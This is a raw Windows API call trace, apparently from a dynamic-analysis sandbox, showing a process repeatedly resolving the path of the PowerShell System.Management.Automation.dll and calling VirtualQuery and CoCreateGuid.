	[0162.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.059] GetLastError () returned 0x0
	[0162.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.059] GetLastError () returned 0x0
	[0162.059] VirtualQuery (in: lpAddress=0xcd3fc, lpBuffer=0xce3fc, dwLength=0x1c | out: lpBuffer=0xce3fc*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xab6d72c, Data2=0x4103, Data3=0x4d1f, Data4=([0]=0x99, [1]=0x5c, [2]=0x74, [3]=0xc9, [4]=0xa6, [5]=0x3d, [6]=0x11, [7]=0x4))) returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.060] GetLastError () returned 0x0
	[0162.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.061] GetLastError () returned 0x0
	[0162.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.061] GetLastError () returned 0x0
	[0162.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.061] GetLastError () returned 0x0
	[0162.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.061] GetLastError () returned 0x0
	[0162.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.061] GetLastError () returned 0x0
	[0162.061] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xfa6959cf, Data2=0x4415, Data3=0x4412, Data4=([0]=0xbe, [1]=0xab, [2]=0x67, [3]=0x0, [4]=0x6c, [5]=0x8c, [6]=0xc6, [7]=0x5))) returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.062] GetLastError () returned 0x0
	[0162.063] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x6d20bdc8, Data2=0xddde, Data3=0x4707, Data4=([0]=0x8e, [1]=0xcd, [2]=0xef, [3]=0x1e, [4]=0xf4, [5]=0xa9, [6]=0x8f, [7]=0x40))) returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.063] GetLastError () returned 0x0
	[0162.064] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x72445134, Data2=0x77a5, Data3=0x4e61, Data4=([0]=0xaf, [1]=0xe0, [2]=0x20, [3]=0x7d, [4]=0x6b, [5]=0x92, [6]=0x74, [7]=0x7d))) returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.064] GetLastError () returned 0x0
	[0162.065] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x761a42a7, Data2=0xa1e4, Data3=0x492a, Data4=([0]=0x93, [1]=0xef, [2]=0x82, [3]=0x43, [4]=0xb5, [5]=0x56, [6]=0xa3, [7]=0x9e))) returned 0x0
	[0162.065] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xb23c7534, Data2=0x6b48, Data3=0x46d6, Data4=([0]=0xab, [1]=0xb5, [2]=0xfd, [3]=0x4d, [4]=0x7e, [5]=0x61, [6]=0xd0, [7]=0xa8))) returned 0x0
	[0162.065] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf16fbdc3, Data2=0x103c, Data3=0x472f, Data4=([0]=0xb9, [1]=0xb0, [2]=0x1c, [3]=0x84, [4]=0x94, [5]=0x92, [6]=0xeb, [7]=0x9a))) returned 0x0
	[0162.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.065] GetLastError () returned 0x0
	[0162.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.065] GetLastError () returned 0x0
	[0162.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.065] GetLastError () returned 0x0
	[0162.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.066] GetLastError () returned 0x0
	[0162.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.066] GetLastError () returned 0x0
	[0162.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.066] GetLastError () returned 0x0
	[0162.066] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x62687afc, Data2=0xf697, Data3=0x437f, Data4=([0]=0xbe, [1]=0xce, [2]=0x35, [3]=0xb8, [4]=0x85, [5]=0xd2, [6]=0x55, [7]=0x41))) returned 0x0
	[0162.066] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.067] GetLastError () returned 0x0
	[0162.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.067] GetLastError () returned 0x0
	[0162.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.067] GetLastError () returned 0x0
	[0162.067] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.067] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.067] GetLastError () returned 0x0
	[0162.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.068] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.068] GetLastError () returned 0x0
	[0162.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.069] GetLastError () returned 0x0
	[0162.256] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.261] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2b0970d0, Data2=0x2b04, Data3=0x4d24, Data4=([0]=0xb6, [1]=0x9, [2]=0xe7, [3]=0x29, [4]=0x7e, [5]=0x4d, [6]=0xa, [7]=0xae))) returned 0x0
	[0162.266] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x26258cbc, Data2=0x12f0, Data3=0x4ad0, Data4=([0]=0xb8, [1]=0x86, [2]=0x54, [3]=0x6c, [4]=0x5a, [5]=0xf0, [6]=0x85, [7]=0x8a))) returned 0x0
	[0162.270] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x3ef114eb, Data2=0x127e, Data3=0x47bc, Data4=([0]=0xb5, [1]=0x3f, [2]=0xc3, [3]=0x86, [4]=0x88, [5]=0x2a, [6]=0x50, [7]=0x26))) returned 0x0
	[0162.270] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xfca7334d, Data2=0xe50c, Data3=0x4444, Data4=([0]=0x81, [1]=0x37, [2]=0x28, [3]=0xc5, [4]=0x3a, [5]=0x46, [6]=0xcc, [7]=0xe4))) returned 0x0
